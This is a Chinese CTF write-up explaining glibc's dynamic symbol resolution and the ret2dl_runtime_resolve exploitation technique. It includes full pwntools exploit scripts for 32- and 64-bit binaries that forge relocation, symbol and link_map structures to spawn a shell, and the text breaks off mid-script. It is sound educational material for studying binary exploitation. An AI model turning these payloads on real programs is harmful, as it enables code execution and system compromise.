---
title: ret2dl利用总结
date: 2022-04-21 23:54:59 +0800
categories:
  - 漏洞利用总结
tags:
  - pwn
  - ctf
permalink: /posts/id=13/
pin: false
published:
---

用到的题目
链接：https://pan.baidu.com/s/1jhb-yswUb90pVj1bPffeJA 
提取码：hhhh 
--来自百度网盘超级会员V4的分享

## 利用原理

因为前段时间buu月赛的题，深入了解了一下ret2dl，做个总结
技巧叫ret2_dl_runtime_resolve
例题是XDCTF 2015 pwn200

> 先讲一些这种利用方法相关的知识

整个大致流程如图
plt->got->plt跳表(push x/jmp)->\_dl_runtime_resolve↓

![在这里插入图片描述](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/2020071611211031.png)

总结：

1.当调用某个属于动态链接库的函数时，进入call之后会来到.plt section的jmp汇编指令

2.如果该函数不是第一次调用，则jmp之后会直接跳转到（jmp ptr）函数的真实地址执行该函数的汇编代码；如果函数是第一次调用，则jmp之后会来到.plt对应的push指令（存放代表该导入函数在.rel.plt（ELF JMPREL Relocation Table）中的偏移的参数reloc_arg

3.执行push指令后会jmp到存放link_map结构体链表的第一个首结点的push指令，将link_map压入到stack中

4.之后会跳转到\_dl_runtime_resolve函数执行\_dl_runtime_resolve(link_map,reloc_arg)

5.在\_dl_runtime_resolve中会调用函数\_dl_fixup(link_map,reloc_arg)去寻找动态链接库在内存中的基地址和该符号的真实地址：

+ 因为第一个link_map的l_info成员中记录了_DYNAMIC节中每一个Elf32_Dyn的所在地址，所以可以通过对应的宏定义索引得到.dynsym（ELF Symbol Table）、.dynstr（ELF String Table）和.rel.plt（ELF JMPREL Relocation Table）的起始地址。
+ 然后会将.rel.plt的起始地址与传入_dl_fixup函数的reloc_offset（即reloc_arg）相加得到该符号的Elf32_Rel结构体的指针地址
+ 之后使用该符号的Elf32_Rel结构体r->info成员将(reloc->r_info)>>8的当作索引以搜寻该符号在ELF Symbol Table中的结构体Elf32_Sym地址
+ 第一个link_map结构体成员的l->l_addr始终为0，与Elf32_Rel结构体的reloc->r_offset成员相加就是该符号的.got.plt地址
+ 安全性检查：检查reloc->r_info成员的最低位是否是0x7，如果不是则触发assert断言。
+ 使用l_info[VERSYMIDX (DT_VERSYM)和vernum[ELFW(R_SYM) (reloc->r_info)] & 0x7fff分别查找vernum、ndx，然后使用这两个结果查找（&l->l_versions[ndx]）当前所解析符号的版本信息：version（version可能为NULL）
+ 调用_dl_lookup_symbol_x查找符号所在动态链接库的link_map，这里使用了该符号对应的ELF String Table即.dynstr section的指针来进行查找，函数返回的result中的l->l_addr是动态链接库的基地址
+ 将sym->st_value（函数在动态链接库中的偏移）和l->addr相加就是所找符号的真实地址（DL_FIXUP_MAKE_VALUE）
+ _dl_runtime_resolve返回后调用该符号。

```
//printf
pwndbg> disassemble 
Dump of assembler code for function _dl_runtime_resolve:
=> 0xf7feadd0 <+0>:	push   eax  //*eax==_DYNAMIC的起始地址
   0xf7feadd1 <+1>:	push   ecx  
   0xf7feadd2 <+2>:	push   edx
   0xf7feadd3 <+3>:	mov    edx,DWORD PTR [esp+0x10]  //esp+0x10中存放的是参数reloc_arg：0x0
   0xf7feadd7 <+7>:	mov    eax,DWORD PTR [esp+0xc]   //esp+0xc中存放的是link_map：0xf7ffd940
   0xf7feaddb <+11>:	call   0xf7fe4f10 <_dl_fixup>
   0xf7feade0 <+16>:	pop    edx
   0xf7feade1 <+17>:	mov    ecx,DWORD PTR [esp]
   0xf7feade4 <+20>:	mov    DWORD PTR [esp],eax
   0xf7feade7 <+23>:	mov    eax,DWORD PTR [esp+0x4]
   0xf7feadeb <+27>:	ret    0xc
End of assembler dump.
pwndbg> 
```

dl_fixup源码

```c

DL_FIXUP_VALUE_TYPE
attribute_hidden __attribute ((noinline)) ARCH_FIXUP_ATTRIBUTE
_dl_fixup (
# ifdef ELF_MACHINE_RUNTIME_FIXUP_ARGS
	   ELF_MACHINE_RUNTIME_FIXUP_ARGS,
# endif
	   struct link_map *l, ElfW(Word) reloc_arg)
{
  const ElfW(Sym) *const symtab = (const void *) D_PTR (l, l_info[DT_SYMTAB]);
  const char *strtab = (const void *) D_PTR (l, l_info[DT_STRTAB]);

  const PLTREL *const reloc
    = (const void *) (D_PTR (l, l_info[DT_JMPREL]) + reloc_offset);
  const ElfW(Sym) *sym = &symtab[ELFW(R_SYM) (reloc->r_info)];
  const ElfW(Sym) *refsym = sym;
  void *const rel_addr = (void *)(l->l_addr + reloc->r_offset);
  lookup_t result;
  DL_FIXUP_VALUE_TYPE value;

  /* Sanity check that we're really looking at a PLT relocation.  */
  assert (ELFW(R_TYPE)(reloc->r_info) == ELF_MACHINE_JMP_SLOT);

   /* Look up the target symbol.  If the normal lookup rules are not
      used don't look in the global scope.  */
  if (__builtin_expect (ELFW(ST_VISIBILITY) (sym->st_other), 0) == 0)
    {
      const struct r_found_version *version = NULL;

      if (l->l_info[VERSYMIDX (DT_VERSYM)] != NULL)
	{
	  const ElfW(Half) *vernum =
	    (const void *) D_PTR (l, l_info[VERSYMIDX (DT_VERSYM)]);
	  ElfW(Half) ndx = vernum[ELFW(R_SYM) (reloc->r_info)] & 0x7fff;
	  version = &l->l_versions[ndx];
	  if (version->hash == 0)
	    version = NULL;
	}

      /* We need to keep the scope around so do some locking.  This is
	 not necessary for objects which cannot be unloaded or when
	 we are not using any threads (yet).  */
      int flags = DL_LOOKUP_ADD_DEPENDENCY;
      if (!RTLD_SINGLE_THREAD_P)
	{
	  THREAD_GSCOPE_SET_FLAG ();
	  flags |= DL_LOOKUP_GSCOPE_LOCK;
	}

#ifdef RTLD_ENABLE_FOREIGN_CALL
      RTLD_ENABLE_FOREIGN_CALL;
#endif

      result = _dl_lookup_symbol_x (strtab + sym->st_name, l, &sym, l->l_scope,
				    version, ELF_RTYPE_CLASS_PLT, flags, NULL);

      /* We are done with the global scope.  */
      if (!RTLD_SINGLE_THREAD_P)
	THREAD_GSCOPE_RESET_FLAG ();

#ifdef RTLD_FINALIZE_FOREIGN_CALL
      RTLD_FINALIZE_FOREIGN_CALL;
#endif

      /* Currently result contains the base load address (or link map)
	 of the object that defines sym.  Now add in the symbol
	 offset.  */
      value = DL_FIXUP_MAKE_VALUE (result,
				   sym ? (LOOKUP_VALUE_ADDRESS (result)
					  + sym->st_value) : 0);
    }
  else
    {
      /* We already found the symbol.  The module (and therefore its load
	 address) is also known.  */
      value = DL_FIXUP_MAKE_VALUE (l, l->l_addr + sym->st_value);
      result = l;
    }

  /* And now perhaps the relocation addend.  */
  value = elf_machine_plt_value (l, reloc, value);

  if (sym != NULL
      && __builtin_expect (ELFW(ST_TYPE) (sym->st_info) == STT_GNU_IFUNC, 0))
    value = elf_ifunc_invoke (DL_FIXUP_VALUE_ADDR (value));

  /* Finally, fix up the plt itself.  */
  if (__glibc_unlikely (GLRO(dl_bind_not)))
    return value;

  return elf_machine_fixup_plt (l, result, refsym, sym, reloc, rel_addr, value);
}
```

======================================================================

接下来是细节介绍
首先32位的Plt表，黄色高亮字一下就是plt跳表，起始0x8048370的位置即plt0

![image-20220331225247130](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220331225247130.png)

push为0x8的倍数是因为ELF32_rel结构体大小为0x8，如果是64位push的就是序号

![image-20220401115003537](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220401115003537.png)再看下got表got+0/got+4/got+8里存放的分别是.dynamic段的地址和linkmap的地址和dl_resolve的地址

![image-20220331225743471](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220331225743471.png)

push的linkmap值就是结构体的首地址0xf7ffd940，link_map的本质是一个巨大的结构体链表，这个链表的作用是记录程序加载的所有共享库的信息，也就是说link_map包含链接器的标识信息等重要内容，当需要查找符号的真实地址时就遍历该链表找到对应的共享库，link_map在ELF文件载入内存时进行初始化

```c
pwndbg> p *l  								//第一个结构体：所在地址0xf7ffd940
$19 = {
  l_addr = 0, 
  l_name = 0xf7ffdc2c "", 
  l_ld = 0x8049638, 
  l_next = 0xf7ffdc30, 
  l_prev = 0x0, 
  l_real = 0xf7ffd940, 
  ......
pwndbg> p *l->l_next 						//第二个结构体：所在地址0xf7ffdc30
$21 = {
  l_addr = 4160573440,          //0xF7FD5000
  l_name = 0xf7ffdea0 "linux-gate.so.1", 
  l_ld = 0xf7fd531c, 
  l_next = 0xf7fd0110, 
  l_prev = 0xf7ffd940, 
  l_real = 0xf7ffdc30, 
  ......
pwndbg> p *l->l_next->l_next 
$22 = {										//第三个结构体：所在地址0xf7fd0110
  l_addr = 4158492672,          //0xF7DD9000
  l_name = 0xf7fd00f0 "/lib/i386-linux-gnu/libc.so.6", 
  l_ld = 0xf7fb0d8c, 
  l_next = 0xf7ffd558 <_rtld_global+1304>, 
  l_prev = 0xf7ffdc30, 
  l_real = 0xf7fd0110, 
pwndbg> p *l->l_next->l_next->l_next
$23 = {										//最后一个结构体：所在地址0xf7ffd558
  l_addr = 4160577536, 			//0xF7FD6000
  l_name = 0x8048134 "/lib/ld-linux.so.2", 
  l_ld = 0xf7ffcf34, 
  l_next = 0x0, 
  l_prev = 0xf7fd0110, 
  l_real = 0xf7ffd558 <_rtld_global+1304>, 
```

然后我们可以通过调试跟进linkmap这个地址里，会发现这里的第三个地址是dynamic地址
在dynamic段中，这里我们主要用到的是三个结构体表项

* DT_STRTAB(ELF String table)
处于.dynamic的地址加0x44的位置；
该元素保存着字符串表地址，在第一部分有描述，包括了符号名，库名，和一些其他的在该表中的字符串。指向**\.dynstr**。
* DT_SYMTAB(ELF symbol table)
处于.dynamic的地址加0x4c的位置；该元素保存着符号表的地址，在第一部分有描述，对32-bit类型的文件来说，关联着一个Elf32_Sym入口。指向**\.dynsym**。
* DT_JMPREL(ELF JMPREL relocation table)
处于.dynamic的地址加0x84的位置；假如存在，它的入口d_ptr成员保存着重定位入口（该入口单独关联着PLT）的地址。假如lazy方式打开，那么分离它们的重定位入口让动态连接器在进程初始化时忽略它们。假如该入口存在，相关联的类型入口DT_PLTRELSZ和DT_PLTREL一定要存在。指向**\.rel.plt**。

![img](https://img-blog.csdnimg.cn/20210501012700825.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2p6YzAyMDEyMQ==,size_16,color_FFFFFF,t_70#pic_center)

后续整个流程可以看[(12条消息) 从o开始的pwn学习之超详细ret2dl_resolve_金语的博客-CSDN博客](https://blog.csdn.net/jzc020121/article/details/116312592)这里叙述的很详细，这个过程很重要，是利用的核心

然后就是这篇cyberangel师傅写的文章，非常详细，必看[高级ROP-ret2dlresolve(1) · 语雀 (yuque.com)](https://www.yuque.com/cyberangel/rg9gdm/oyne1i#GUvKY)

======================================================================

```bash
# 一些需要用到的命令，main为文件名
readelf -x .rel.plt main # 查看对应节
readelf -a main # 查看所有信息，各个节段
```

|          | no-relro | partial-relro | full-relro |
| -------- | -------- | ------------- | ---------- |
| .dynamic | 可写     | 只读          | 只读       |
| .got.plt | 可写     | 可写          | 只读       |
| .got     | 可写     | 只读          | 只读       |

## X86

对这块的知识都了解了以后，就是利用。我觉得cyberangel师傅的博客里例题和原理分析已经很详细了，这里我主要讲一下利用方面

### no relro

因为relro是关闭的，所以dynamic段是可写的，那直接去伪造DT_STRTAB

之所以不直接修改原DT_STRTAB中的函数名，是因为DT_STRTAB不可写

```python
#coding=utf-8
from pwn import *
context.log_level="debug"

p=process('./main_no_relro_32')
elf=ELF('./main_no_relro_32')
bss_addr=elf.bss()
read_plt=elf.plt['read']
write_plt=elf.plt['write']
pop_ebp=0x0804862b
leave=0x0804851A
pop_esi_edi_ebp=0x08048629# 占位
new_stack=bss_addr+0x300

# 栈迁移跳转执行
payload1='a'*112+p32(read_plt)+p32(pop_esi_edi_ebp)+p32(0)+p32(bss_addr+0x300)+p32(0x500)
payload1+=p32(pop_ebp)+p32(new_stack)+p32(leave)
p.recvuntil('Welcome to XDCTF2015~!\n')
p.sendline(payload1)

# 修改strtable地址同时布置fakestrtable
dynstr=elf.get_section_by_name('.dynstr').data()
fake_dynstr=dynstr.replace('write','system')
strtab = 0x08049808 # .dynamic节中strtab的地址
write_pltjmp=0x080483A6

payload2 = p32(0xdeadbeef)+p32(read_plt)+p32(write_pltjmp)+p32(0)+ p32(strtab)+p32(7)+fake_dynstr
p.sendline(payload2)
payload3 = p32(new_stack+0x18)+';sh'
p.send(payload3)

p.interactive()
```

### partial relro

基本的分步式原理就不再赘述，主要是在bss段上伪造**dynrel+dynsym**+systemstring，所有的偏移由systemstring的地址来确定

![image-20220401120029160](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220401120029160.png)

```python
#coding=utf-8
from pwn import *
context.log_level="debug"

p=process('./bof')
elf=ELF('./bof')
bss_addr=elf.bss()
read_plt=elf.plt['read']
write_plt=elf.plt['write']

pop_ebp_gadget = 0x0804862b
leave_retn_gadget=0x08048445
three_pop_gadget=0x08048629

cmd = "/bin/sh\x00"
plt0 = elf.get_section_by_name('.plt').header.sh_addr
relplt = elf.get_section_by_name(".rel.plt").header.sh_addr
dynsym = elf.get_section_by_name(".dynsym").header.sh_addr
dynstr = elf.get_section_by_name(".dynstr").header.sh_addr
base=bss_addr+0x800

payload1 = 'a'*112+p32(read_plt)+p32(three_pop_gadget)+p32(0)+p32(bss_addr+0x800)+p32(0x100)
payload1 += p32(pop_ebp_gadget)+p32(base)+p32(leave_retn_gadget)
p.recvuntil('Welcome to XDCTF2015~!\n')
p.sendline(payload1)

base=bss_addr+0x800+4

reloc_index = base + 4*6 - relplt 

elf_sym_addr = base + 4*8
align = 0x10 - ((elf_sym_addr - dynsym) & 0xf) #进行对齐
elf_sym_addr = elf_sym_addr + align            #重新计算fake_Elf32_Sym地址

r_offset = elf.got['write']  
idx_dynsym = (elf_sym_addr - dynsym) / 0x10
r_info = (idx_dynsym << 8) | 0x7               #根据fake_Elf32_Sym反推r_info
elf_rel = p32(r_offset)+p32(r_info)            #伪造write的Elf32_Rel结构体


fake_st_name = elf_sym_addr + 0x10 - dynstr
fake_st_valve = 0
fake_st_size = 0 
fake_st_info = 0x12
fake_st_other = 0
fake_st_shndx = 0
elf_sym = p32(fake_st_name)+p32(fake_st_valve)+p32(fake_st_size)+p8(fake_st_info)+p8(fake_st_other)+p16(fake_st_shndx)

payload2 = p32(0xdeadbeef)
payload2 += p32(plt0)+p32(reloc_index)+'aaaa'
payload2 += p32(base- 4+0x80)+'aaaa'+'aaaa'     #用于补全
payload2 += elf_rel
payload2 += 'a'*align
payload2 += elf_sym 
payload2 += "system\x00"
payload2 += 'a'*(0x80-len(payload2))
payload2 += cmd
payload2 += 'a'*(0x100-len(payload2))

p.sendline(payload2)
p.interactive()
```

## X64

与32位不同，在64位中此函数的名称为\_dl_runtime_resolve_xsavec；但是无论是在32位程序或者是64位程序中这个函数的参数都是一样的：_dl_runtime_resolve_xsavec(link_map,reloc_arg)。这里的reloc_arg和32位的有所不同，不再代表偏移而是代表索引

### no relro

思路同32位，在bss段上伪造dynstr

![image-20220402105325494](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220402105325494.png)

```python
#coding=utf-8
from pwn import *
context.log_level='debug'
context.arch='amd64'

p=process('./main_no_relro_64')
elf=ELF('./main_no_relro_64')
bss_addr=elf.bss()
'''
text:0000000000400750 loc_400750:                             ; CODE XREF: __libc_csu_init+54↓j
.text:0000000000400750                 mov     rdx, r15
.text:0000000000400753                 mov     rsi, r14
.text:0000000000400756                 mov     edi, r13d
.text:0000000000400759                 call    qword ptr [r12+rbx*8]  //r12 read_got ;rbx==0
.text:000000000040075D                 add     rbx, 1
.text:0000000000400761                 cmp     rbp, rbx               
.text:0000000000400764                 jnz     short loc_400750       //相等；rbp==1
.text:0000000000400766
.text:0000000000400766 loc_400766:                             ; CODE XREF: __libc_csu_init+34↑j
.text:0000000000400766                 add     rsp, 8
.text:000000000040076A                 pop     rbx          //rbx==0
.text:000000000040076B                 pop     rbp          //rbp==1
.text:000000000040076C                 pop     r12          //read_got
.text:000000000040076E                 pop     r13          //read1参
.text:0000000000400770                 pop     r14          //read2参
.text:0000000000400772                 pop     r15          //read3参
.text:0000000000400774                 retn
'''

libc_csu_init_gadget_start1_addr=0x40076A
libc_csu_init_gadget_start2_addr=0x400750
read_plt_addr=elf.plt['read']
strlen_plt_addr=elf.plt['strlen']
strlen_jmpplt=strlen_plt_addr+0x6
main_addr=elf.sym['main']
vuln_addr=elf.sym['vuln']
new_stack=bss_addr+0x200
pop_rbp=0x0000000000400588
pop_rdi=0x400773
pop_rsi_r15=0x400771
leave=0x40063c
dynstr=0x0600988+0x8

# 2次read，1次call dl
payload1=120*'a'
payload1+=p64(pop_rdi)+p64(0)+p64(pop_rsi_r15)+p64(new_stack)+p64(0xdeadbeef)+p64(read_plt_addr)
payload1+=p64(pop_rdi)+p64(0)+p64(pop_rsi_r15)+p64(dynstr)+p64(0xdeadbeef)+p64(read_plt_addr)
payload1+=p64(0x4004c6)+p64(pop_rdi)+p64(new_stack)+p64(strlen_jmpplt) 
#0x4004c6为return，是为了调整栈避免调用system时段错误:movaps xmmword ptr [rsp + 0x40], xmm0
p.recvuntil('Welcome to XDCTF2015~!\n')
p.send(payload1)

dynstr=elf.get_section_by_name('.dynstr').data()
fake_dynstr=dynstr.replace('strlen','system')
payload2="/bin/sh\x00".ljust(0x10,'\x00')+fake_dynstr
p.send(payload2)

payload3=p64(new_stack_esp+0x10)# 改dynstr的地址
p.send(payload3)
p.interactive()
```

### partial relro

同32位的思路。整个流程是一个倒推的思路，cyberangle师傅的文章有分步解析，这里只讲一下###中间部分

脚本会crash的原因，是因为过不了判断，让程序不进入if (l->l_info[VERSYMIDX (DT_VERSYM)] != NULL)而直接向下执行需要泄露（write）出link_map的首结点地址，即泄露0x601008处存放的地址：

所以泄露地址后将 l->l_info[VERSYMIDX(DT_VERSYM)] 设置为NULL即可绕过此if语句

![image-20220402110946393](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220402110946393.png)

```python
#coding=utf-8
from pwn import *
context.log_level='debug'
context.arch='amd64'

p=process('./main_partial_relro_64')
elf=ELF('./main_partial_relro_64')
bss_addr=elf.bss()
'''
.text:0000000000400780 loc_400780:                             ; CODE XREF: __libc_csu_init+54↓j
.text:0000000000400780                 mov     rdx, r15
.text:0000000000400783                 mov     rsi, r14
.text:0000000000400786                 mov     edi, r13d
.text:0000000000400789                 call    qword ptr [r12+rbx*8]  //r12 read_got ;rbx==0
.text:000000000040078D                 add     rbx, 1
.text:0000000000400791                 cmp     rbp, rbx
.text:0000000000400794                 jnz     short loc_400780       //相等；rbp==1
.text:0000000000400796
.text:0000000000400796 loc_400796:                             ; CODE XREF: __libc_csu_init+34↑j
.text:0000000000400796                 add     rsp, 8
.text:000000000040079A                 pop     rbx          //rbx==0
.text:000000000040079B                 pop     rbp          //rbp==1
.text:000000000040079C                 pop     r12          //read_got
.text:000000000040079E                 pop     r13          //read1参
.text:00000000004007A0                 pop     r14          //read2参
.text:00000000004007A2                 pop     r15          //read3参
.text:00000000004007A4                 retn
.text:00000000004007A4 ; } // starts at 400740
.text:00000000004007A4 __libc_csu_init endp
'''
libc_csu_init_gadget_start1_addr=0x40079A
libc_csu_init_gadget_start2_addr=0x400780

read_plt_addr=elf.plt['read']
write_got_addr=elf.got['write']
new_stack=bss_addr+0x200
pop_rbp=0x4005b8
pop_rdi=0x4007a3
pop_rsi_r15=0x4007a1
leave=0x40066c
main_addr=elf.sym['main']
vuln_addr=elf.sym['vuln']
jmp_dl_runtime_resolve_addr=0x000400500# plt0

rela_plt_start_addr=elf.get_section_by_name('.rela.plt').header.sh_addr
real_dynstr_start_addr=elf.get_section_by_name('.dynstr').header.sh_addr
real_dynsym_start_addr=elf.get_section_by_name('.dynsym').header.sh_addr
# 伪造sym
fake_st_name=new_stack+len('/bin/sh\x00')-real_dynstr_start_addr
fake_st_info=0x12
fake_st_other=0x0
fake_st_shndx=0x0
fake_st_value=0x0
fake_st_size=0x0
fake_write_ELF64_Sym=p32(fake_st_name)+p8(fake_st_info)+p8(fake_st_other)+p16(fake_st_shndx)+p64(fake_st_value)+p64(fake_st_size)
fake_write_ELF64_Sym_start_addr=new_stack+0x10  #ELF64_Sym起始地址
align=0x18-((fake_write_ELF64_Sym_start_addr-real_dynsym_start_addr)&0xf)# 对齐
fake_write_ELF64_Sym_start_addr+=align
log.info(hex(fake_write_ELF64_Sym_start_addr))
print align

# 伪造rel
fake_r_offset=elf.got['write']
dynsym_index=(fake_write_ELF64_Sym_start_addr-real_dynsym_start_addr)/0x18  #32位的是0x10
print dynsym_index
fake_r_info=dynsym_index<<32 | 7
fake_r_addend=0x0
fake_write_Elf64_Rela=p64(fake_r_offset)+p64(fake_r_info)+p64(fake_r_addend)
fake_write_Elf64_Rela_start_addr=new_stack_esp+0x10+len(fake_write_ELF64_Sym)+align
log.info(hex(fake_write_Elf64_Rela_start_addr))
# 伪造fake_reloc
fake_reloc_arg=(fake_write_Elf64_Rela_start_addr-rela_plt_start_addr)/0x18

# 改掉linkmap_addr+0x1c8的位置置零
####################################################
write_got_addr=elf.got['write']
read_got_addr=elf.got['read']
payload0=120*'a'
payload0+=p64(libc_csu_init_gadget_start1_addr)+p64(0)+p64(1)+p64(write_got_addr)+p64(1)+p64(0x601008)+p64(0x8)
payload0+=p64(libc_csu_init_gadget_start2_addr)+p64(0xdeadbeef)*7+p64(main_addr)
p.recvuntil('Welcome to XDCTF2015~!\n')
p.send(payload0)# leak linkmapaddr

link_map_addr=u64(p.recv(8))
print hex(link_map_addr)
link_map_l_info_VERSYMIDX_DT_VERSYM_addr=link_map_addr+0x1c8
print hex(link_map_l_info_VERSYMIDX_DT_VERSYM_addr)
fake_map_l_info_VERSYMIDX_DT_VERSYM=120*'a'
fake_map_l_info_VERSYMIDX_DT_VERSYM+=p64(libc_csu_init_gadget_start1_addr)+p64(0)+p64(1)+p64(read_got_addr)+p64(0)+p64(link_map_l_info_VERSYMIDX_DT_VERSYM_addr)+p64(0x100)
fake_map_l_info_VERSYMIDX_DT_VERSYM+=p64(libc_csu_init_gadget_start2_addr)+p64(0xdeadbeef)*7+p64(main_addr)
p.recvuntil('Welcome to XDCTF2015~!\n')
sleep(1)
p.send(fake_map_l_info_VERSYMIDX_DT_VERSYM)
p.send(p64(0))
#######################################################

payload1=120*'a'
payload1+=p64(pop_rdi)+p64(0)+p64(pop_rsi_r15)+p64(new_stack)+p64(0xdeadbeef)+p64(read_plt_addr) #向new_stack_esp中写入/bin/sh\x00
payload1+=p64(pop_rdi)+p64(0)+p64(pop_rsi_r15)+p64(fake_write_ELF64_Sym_start_addr)+p64(0xdeadbeef)+p64(read_plt_addr) #0x10中写入fake_write_Elf64_Sym
payload1+=p64(main_addr)

p.recvuntil('Welcome to XDCTF2015~!\n')
p.send(payload1)
sleep(1)
p.send("/bin/sh\x00system\x00".ljust(0x10,'\x00')) #改为system字符串
sleep(1)
p.send(fake_write_ELF64_Sym)  #fake_write_Elf64_Sym
sleep(1)

payload2=120*'b'+p64(pop_rdi)+p64(0)+p64(pop_rsi_r15)+p64(fake_write_Elf64_Rela_start_addr)+p64(0xdeadbeef)+p64(read_plt_addr)+p64(main_addr)
p.recvuntil('Welcome to XDCTF2015~!\n')
p.send(payload2)
p.send(fake_write_Elf64_Rela) #fake_write_Elf64_Rela

payload3=120*'c'+p64(pop_rdi)+p64(new_stack)
payload3+=p64(jmp_dl_runtime_resolve_addr)+p64(fake_reloc_arg)+p64(0xdeadbeef) 
sleep(1)
p.recvuntil('Welcome to XDCTF2015~!\n')
p.send(payload3)
p.interactive()
```

但这种方法需要用到write这样的输出函数，这种题大多数没有输出函数，所以有了一种修改linkmap的方法

linkmap

```c
pwndbg> ptype l
type = struct link_map {
    Elf64_Addr l_addr;
    char *l_name;
    Elf64_Dyn *l_ld;
    struct link_map *l_next;
    struct link_map *l_prev;
    struct link_map *l_real;
    Lmid_t l_ns;
    struct libname_list *l_libname;
    Elf64_Dyn *l_info[76];  //l_info 里面包含的就是动态链接的各个表的信息
    ...
    size_t l_tls_firstbyte_offset;
    ptrdiff_t l_tls_offset;
    size_t l_tls_modid;
    size_t l_tls_dtor_count;
    Elf64_Addr l_relro_addr;
    size_t l_relro_size;
    unsigned long long l_serial;
    struct auditstate l_audit[];
} *
```



![image-20220402113032068](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220402113032068.png)

这是wiki的做法，利用csu来实现完整输入。有时候无法完全输入fake_linkmap时也可以用栈迁移

```python
from pwn import *
# context.log_level="debug"
context.arch = "amd64"
p = process("./main_partial_relro_64")
elf = ELF("./main_partial_relro_64")
libc = ELF('libc.so.6')
bss_addr = elf.bss()
csu_front_addr = 0x400780
csu_end_addr = 0x40079A
vuln_addr = 0x400637

def csu(rbx, rbp, r12, r13, r14, r15):
    # pop rbx, rbp, r12, r13, r14, r15
    # rbx = 0
    # rbp = 1, enable not to jump
    # r12 should be the function that you want to call
    # rdi = edi = r13d
    # rsi = r14
    # rdx = r15
    payload = p64(csu_end_addr)
    payload += p64(rbx) + p64(rbp) + p64(r12) + p64(r13) + p64(r14) + p64(r15)
    payload += p64(csu_front_addr)
    payload += '\x00' * 0x38
    return payload


def ret2dlresolve_with_fakelinkmap_x64(elf, fake_linkmap_addr, known_function_ptr, offset_of_two_addr):
    '''
    elf: is the ELF object

    fake_linkmap_addr: the address of the fake linkmap

    known_function_ptr: a already known pointer of the function, e.g., elf.got['__libc_start_main']

    offset_of_two_addr: target_function_addr - *(known_function_ptr), where
                        target_function_addr is the function you want to execute

    WARNING: assert *(known_function_ptr-8) & 0x0000030000000000 != 0 as ELF64_ST_VISIBILITY(o) = o & 0x3

    WARNING: be careful that fake_linkmap is 0x100 bytes length   

    we will do _dl_runtime_resolve(linkmap,reloc_arg) where reloc_arg=0

    linkmap:
        0x00: l_addr = offset_of_two_addr
      ↓fake_DT_JMPREL entry, addr = fake_linkmap_addr + 0x8
        0x08: 17, tag of the JMPREL
        0x10: fake_linkmap_addr + 0x18, pointer of the fake JMPREL
      fake_JMPREL, addr = fake_linkmap_addr + 0x18
        0x18: p_r_offset, offset pointer to the resloved addr
        0x20: r_info
        0x28: append
      resolved addr
        0x30: r_offset
      fake_DT_SYMTAB, addr = fake_linkmap_addr + 0x38
        0x38: 6, tag of the DT_SYMTAB
        0x40: known_function_ptr-8, p_fake_symbol_table
      command that you want to execute for system
        0x48: /bin/sh
      P_DT_STRTAB, pointer for DT_STRTAB
        0x68: fake a pointer, e.g., fake_linkmap_addr
      p_DT_SYMTAB, pointer for fake_DT_SYMTAB
        0x70: fake_linkmap_addr + 0x38
      p_DT_JMPREL, pointer for fake_DT_JMPREL
        0xf8: fake_linkmap_addr + 0x8
    '''
    plt0 = elf.get_section_by_name('.plt').header.sh_addr

    linkmap = p64(offset_of_two_addr & (2**64 - 1))
    linkmap += p64(17) + p64(fake_linkmap_addr + 0x18)
    # here we set p_r_offset = fake_linkmap_addr + 0x30 - two_offset
    # as void *const rel_addr = (void *)(l->l_addr + reloc->r_offset) and l->l_addr = offset_of_two_addr
    linkmap += p64((fake_linkmap_addr + 0x30 - offset_of_two_addr)
                   & (2**64 - 1)) + p64(0x7) + p64(0)
    linkmap += p64(0)
    linkmap += p64(6) + p64(known_function_ptr-8)
    linkmap += '/bin/sh\x00'           # cmd offset 0x48
    linkmap = linkmap.ljust(0x68, 'A')
    linkmap += p64(fake_linkmap_addr)
    linkmap += p64(fake_linkmap_addr + 0x38)
    linkmap = linkmap.ljust(0xf8, 'A')
    linkmap += p64(fake_linkmap_addr + 8)

    resolve_call = p64(plt0+6) + p64(fake_linkmap_addr) + p64(0)# +6=jmp2dl
    return (linkmap, resolve_call)

# 1
fake_linkmap_addr = bss_addr+0x100
# construct fake string, symbol, reloc.modify .dynstr pointer in .dynamic section to a specific location
rop = ROP("./main_partial_relro_64")
offset = 112+8
rop.raw(offset*'\x00')
link_map, resolve_call =ret2dlresolve_with_fakelinkmap_x64(elf,fake_linkmap_addr,elf.got['read'],libc.sym['system']-libc.sym['read'])
rop.raw(csu(0, 1, elf.got['read'], 0, fake_linkmap_addr, len(link_map)))
rop.raw(vuln_addr)
rop.raw("a"*(0x100-len(rop.chain())))
assert(len(rop.chain()) <= 0x100)

p.recvuntil('Welcome to XDCTF2015~!\n')
p.send(rop.chain())
p.send(link_map)

# 2
rop = ROP("./main_partial_relro_64")
rop.raw(offset*'\x00')
#0x00000000004007a1: pop rsi; pop r15; ret; 
rop.raw(0x00000000004007a1)  # stack align 16 bytes
rop.raw(0)
rop.raw(0)
rop.raw(0x00000000004007a3)  # 0x00000000004007a3: pop rdi; ret;
rop.raw(fake_linkmap_addr + 0x48)# /bin/sh
rop.raw(resolve_call)
p.send(rop.chain())
p.interactive()
```

这里给一道例题

### checkin（仅溢出8字节）

![image-20220402194923569](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220402194923569.png)

题目只有一个read，此外没有别的函数

这道题就是一个linkmap拆开读入进去，学到了一个栈迁移的小细节：一般我们栈迁移拼接payload读入2次，下一次读入就会在那条payload+8处直接执行，这时候如果在这个位置放上一个leave_ret，就能跳转到ebp+8处执行，从而继续控制程序流。这条payload还必须填满。

![image-20220402200901900](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220402200901900.png)

```python
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
p = process('./checkin')
elf = ELF('./checkin')
libc = elf.libc

plt0 = elf.get_section_by_name('.plt').header.sh_addr
rop_addr = 0x404000 + 0x700
pop_rdi_ret = 0x401253
leave_ret= 0x4011e2
main_read = 0x4011bf

def create_fake_link_map_1(fake_addr, known_got, reloc_index, offset):
